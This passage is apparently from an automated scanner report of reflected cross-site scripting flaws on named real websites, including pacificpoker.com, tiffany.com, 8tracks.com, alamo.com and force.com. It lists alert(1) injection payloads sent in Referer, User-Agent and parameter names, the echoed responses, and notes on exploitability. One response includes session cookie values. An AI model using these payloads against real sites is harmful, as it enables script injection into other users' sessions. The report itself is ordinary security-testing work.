Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 91740<script>alert(1)</script>1a735c0a5ee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<title>Singles Dating :: Personals Site :: Women Seeking Men</title> <script language="javascript" type="text/javascript"> if (self != top) { if (document.im ...[SNIP]... <b>91740<SCRIPT>ALERT(1)</SCRIPT>1A735C0A5EE</b> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85f9e"%3balert(1)//ad70704b4a9 was submitted in the Referer HTTP header. This input was echoed as 85f9e";alert(1)//ad70704b4a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 243eb"><script>alert(1)</script>bc93ac1cd73 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb66f"><script>alert(1)</script>4037935a9a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload f1901<script>alert(1)</script>a5ecaf5203a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8568"><script>alert(1)</script>9db11d77501 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f149a"-alert(1)-"255280f886e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" version="XHTML+RDFa 1 ...[SNIP]... <![CDATA[ /* You may give each page an identifying name, server, and channel on the next lines. */
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb369'-alert(1)-'7658685b4f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bf8"><script>alert(1)</script>b2ee995e5d6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3de68"><a>51b72db6471 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 5b25e<script>alert(1)</script>1a0cb81415e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7ddc9<script>alert(1)</script>4fe15cfe632 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> <head><title> Welcome to MetaPress </title><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" /><link hr ...[SNIP]... <br>HTTP User Agent: 7ddc9<script>alert(1)</script>4fe15cfe632<br> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3dca2'-alert(1)-'4810f0b2578 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into an HTML comment. The payload a6aae--><script>alert(1)</script>afbe724f576 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 15:12:57 GMT Server: Apache Content-Length: 381 Vary: Accept-Encoding Connection: close Content-Type: text/html
<html><head> <!-- The server is oma-www36.xosn.com/10.3.9.171--><!-- The time is 04/02/2011 10:12:57 AM EST--><!-- The referer is http://www.google.com/search?hl=en&q=a6aae--><script>alert(1)</script>afbe724f576--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b600'-alert(1)-'0ea4449f546 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55df7'-alert(1)-'e1ef2702f3d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Sat, 02 Apr 2011 15:27:43 GMT P3p: policyref="http://www.pacificpoker.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP CAO COR UNI COM NAV" Cache-control: no-cache Content-type: text/html;charset=ISO-8859-1 Set-cookie: MyCookie=gln1-sol10-147; Domain=.pacificpoker.com; Path=/ Set-cookie: JSESSIONID=5A73E8060C86084669053EE82D5B0141; Domain=.pacificpoker.com Set-cookie: OANID=gomipcpenib7ef4fc6c3e9c4414ff9ee8c; Domain=.pacificpoker.com; Expires=Sun, 02-Oct-2011 15:27:43 GMT; Path=/ Set-cookie: scut=lang**en__s**615638281852611860__os**615638281852611860__sr**945185__osr**945185__flag**No__l**__ic**51__st**0__bc**0__anid**gomipcpenib7ef4fc6c3e9c4414ff9ee8c__se**900000__osadcampaign**; Domain=.pacificpoker.com; Path=/ Content-Length: 73530
<!-- gln1-sol10-147 --><!-- / -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN ...[SNIP]... "gomipcpenib7ef4fc6c3e9c4414ff9ee8c"; var showCurHP = "false"; var sVer7 = "false"; var sSESerial = "900000"; var sUserAgent = 'curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.355df7'-alert(1)-'e1ef2702f3d'; var flashURL = "null"; var italyDomain = "special.servletmaxlife.com"; var unknown = "true"; var sOsadcampaign = ""; var Domain = "www.pacificpoker.com";
The value of the Referer HTTP header is copied into an HTML comment. The payload 548a7--><script>alert(1)</script>bb4f9ff3fde was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into an HTML comment. The payload f2dbd--><script>alert(1)</script>6037b7be2a6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 157e7'-alert(1)-'f898fdcea0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abea2'-alert(1)-'25682bbcd9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74e06"-alert(1)-"034d1bf96e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83eff'-alert(1)-'f714e089ce6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef66e'-alert(1)-'370dc472c34 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... if redirection to international page is needed. If needed, return the URL var redirectToInternationalPageURL = '/International.aspx?origref=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3def66e'-alert(1)-'370dc472c34';
//Redirect users to International.aspx, that don't have a cookie set and //don't have Site id passed in the query string and the request came to tiffany.com. if((redirectToIn ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ba0a"><script>alert(1)</script>ab38a3dd817 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4112'-alert(1)-'e51c450e111 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2deb6</script><script>alert(1)</script>4c5b8a89a54 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf9d9'-alert(1)-'1f68a952df2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de661'-alert(1)-'1cd2301d5dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a9a"><script>alert(1)</script>d2e55111866 was submitted in the Referer HTTP header. This input was echoed as 55a9a\"><script>alert(1)</script>d2e55111866 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
2.99. http://www.8tracks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.8tracks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2d0a<script>alert(1)</script>b7a0edcfda0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Redirecting to <a href="http://8tracks.com/?b2d0a<script>alert(1)</script>b7a0edcfda0=1">http://8tracks.com/?b2d0a<script>alert(1)</script>b7a0edcfda0=1</a>
2.100. http://www.8tracks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.8tracks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 539e3"><script>alert(1)</script>637fde56121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Redirecting to <a href="http://8tracks.com/?539e3"><script>alert(1)</script>637fde56121=1">http://8tracks.com/?539e3"><script>alert(1)</script>637fde56121=1</a>
2.101. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.alamo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 828c9</title><a>03c6aeed4e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.alamo.com/?828c9</title><a>03c6aeed4e1=1</TITLE></HEAD><BODY><A HREF="https://www.alamo.com/?828c9</title><a>03c6aeed4e1=1">https://www.alamo.com/?828c9</tit ...[SNIP]...
2.102. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.alamo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa32"><a>b27a94bfd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.alamo.com/?bfa32"><a>b27a94bfd2=1</TITLE></HEAD><BODY><A HREF="https://www.alamo.com/?bfa32"><a>b27a94bfd2=1">https://www.alamo.com/?bfa32"><a>b27a94bfd2=1</ ...[SNIP]...
2.103. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.alamo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 333d9<a>d9aa5621cfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.alamo.com/?333d9<a>d9aa5621cfd=1</TITLE></HEAD><BODY><A HREF="https://www.alamo.com/?333d9<a>d9aa5621cfd=1">https://www.alamo.com/?333d9<a>d9aa5621cfd=1</A>< ...[SNIP]...
2.104. http://www.downloadsquad.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.downloadsquad.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2265"><script>alert(1)</script>c1f93e51337 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
2.105. http://www.force.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.force.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c4454<script>alert(1)</script>825772b2f33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
The URL has moved to <a href="http://www.salesforce.com/platform?c4454<script>alert(1)</script>825772b2f33=1">http://www.salesforce.com/platform?c4454<script>alert(1)</script>825772b2f33=1</a>
2.106. http://www.force.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.force.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e588e"><script>alert(1)</script>d061efa9f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
The URL has moved to <a href="http://www.salesforce.com/platform?e588e"><script>alert(1)</script>d061efa9f5e=1">http://www.salesforce.com/platform?e588e"><script>alert(1)</script>d061efa9f5e=1</a>
2.107. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.nationalcar.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 39c01</title><a>81980736ddf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.nationalcar.com/?39c01</title><a>81980736ddf=1</TITLE></HEAD><BODY><A HREF="https://www.nationalcar.com/?39c01</title><a>81980736ddf=1">https://www.nationalc ...[SNIP]...
2.108. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.nationalcar.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f55f"><a>e5ae426b094 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
